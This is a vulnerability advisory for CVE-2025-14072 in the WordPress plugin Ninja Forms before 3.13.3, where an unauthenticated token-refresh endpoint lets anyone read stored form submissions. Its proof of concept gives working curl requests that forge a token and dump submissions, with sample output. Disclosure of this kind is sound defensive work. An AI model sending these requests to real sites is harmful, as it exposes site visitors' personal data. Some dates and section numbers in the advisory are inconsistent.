Marco Lunardi discovered a high-impact vulnerability in Ninja Forms < 3.13.3 that allows unauthenticated remote attackers to generate valid access tokens and fully disclose stored form submissions via exposed REST API endpoints. The issue stems from a complete lack of authentication and authorization checks in the token refresh mechanism, enabling arbitrary enumeration of form IDs and unauthorized access to sensitive user data.
Given the severity of the flaw and the widespread deployment of the plugin, the vulnerability poses significant privacy and compliance risks for affected websites.
Unauthenticated Token Generation and Submission Disclosure in Ninja Forms < 3.13.3
Name Unauthenticated Token Forging and Data Exposure
Systems Affected WordPress - Ninja Forms < 3.13.3
Severity High 7.5/10
Impact CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Vendor https://wordpress.org/plugins/ninja-forms/
Advisory https://www.ush.it/team/ush/hack-ninja-forms/token-ninja-forms-3.13.3.txt
Authors Marco Lunardi
Date 20251016
I. BACKGROUND
Ninja Forms is one of the most widely used WordPress form builders,
installed on hundreds of thousands of websites globally. The plugin
allows administrators to create contact forms, collect submissions and
manage user-provided data from within the WordPress dashboard.
II. DESCRIPTION
A critical vulnerability has been identified in Ninja Forms version
< 3.13.3 which allows unauthenticated attackers to generate valid access
tokens for arbitrary form IDs. These tokens are issued via a publicly
accessible REST API endpoint designed to refresh authentication tokens.
The endpoint responsible for token generation performs no user
authentication, capability check, or nonce validation, meaning any
remote user can request and obtain a valid token. The issued token is
then accepted by further REST API endpoints that expose form submission
data.
As a result, any unauthenticated attacker can enumerate form identifiers
and retrieve stored submissions including names, email addresses and any
other personal or sensitive data submitted via affected forms.
This constitutes a severe Broken Access Control condition combined with
sensitive information disclosure.
III. ANALYSIS
Practical confirmed impacts include:
- Complete disclosure of stored form submissions
- Exposure of personal and potentially sensitive user data
- Violation of data protection and privacy obligations
- Risk of GDPR non-compliance for EU-based website owners
Proof of Concept
1. Create a form and note the Form ID (ex: 1)
2. Submit an entry.
3. Generate a valid token without authentication:
curl -X POST "http://example.com/?rest_route=/ninja-forms-views/token/refresh" -d "formIds[]=1"
Example output:
{"token": "<TOKEN>", "publicKey": "...", "expiresIn": 900, "formIds": [1]}
4. Use the token to read all submissions:
curl "http://example/com/?rest_route=/ninja-forms-views/forms/1/submissions" -H "X-NinjaFormsViews-Auth: <TOKEN>"
Example output:
{"1": "Alice", "2": "[email protected]", "3": "Test message"}
This confirms complete disclosure of all form data.
IV. WORKAROUND
Confirmed affected:
- Ninja Forms < 3.13.3
Earlier versions may also be affected but were not tested.
V. CVSS 3.1
CVSS Base Score: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
VI. ROOT CAUSE
The REST endpoint responsible for generating access tokens does not
enforce any authentication or authorization controls, allowing anonymous
users to request valid tokens. These tokens are subsequently trusted by
other endpoints handling submission data access.
VII. MITIGATION
Website administrators should:
- Update Ninja Forms to the latest available version
- Revoke any previously issued access tokens
- Audit access logs for suspicious submission access activities
VI. CVE INFORMATION
CVE-2025-14072 has been officially published.
https://www.cve.org/CVERecord?id=CVE-2025-14072
VII. DISCLOSURE TIMELINE
20251116 Vulnerability discovered
20251117 Issue reported to WPScan
20251204 WPScan reviews the vulnerability
20251204 WPScan confirms the vulnerability and assigns CVE-2025-14072
20251208 Vendor releases updated Ninja Forms version 3.13.3 containing the fix
VIII. CREDIT
This vulnerability was discovered by Marco Lunardi with contributions by
Francesco "ascii" Ongaro and Pasquale "sid" Fiorillo.
IX. LEGAL NOTICE
Copyright (c) 2026 Marco Lunardi
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.